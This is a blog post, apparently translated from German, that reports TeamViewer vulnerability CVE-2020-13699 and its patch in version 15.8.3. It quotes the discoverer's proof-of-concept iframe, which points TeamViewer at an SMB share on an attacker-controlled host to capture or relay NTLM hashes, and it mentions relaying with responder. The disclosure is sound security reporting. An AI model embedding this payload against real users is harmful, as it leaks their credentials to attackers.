TeamViewer: Patch closes vulnerability CVE-2020-13699 on PC

[German]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.


Advertising

The vulnerability CVE-2020-13699

Vulnerability CVE-2020-13699 affected the TeamViewer Desktop for Windows up to version 15.8.2, which does not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:

teamviewer10: –play URL

This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking. The discoverer of the vulnerability describes it here as follows.

An attacker could embed a malicious iframe in a website with a crafted URL:

<iframe src="teamviewer10: –play \\attacker-IP\share\fake.tvs">

that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).

This could be used in Watering Hole attacks to connect unnoticed, as you can read here. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited. 

Update to TeamViewer version 15.8.3

With Bleeping Computer I noticed here that there was an update of TeamViewer to version 15.8.3 which closes the vulnerability. However, the vendor announced the update in this community post about 2 weeks ago. 


Advertising

Statement on CVE 2020-13699

Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.

We implemented some improvements in URI handling relating to CVE 2020-13699.

The changes can be found in the changelog.


Advertising

This entry was posted in Security, Software, Update and tagged . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

Note: Please note the rules for commenting on the blog (first comments and linked posts end up in moderation, I release them every few hours, I rigorously delete SEO posts/SPAM).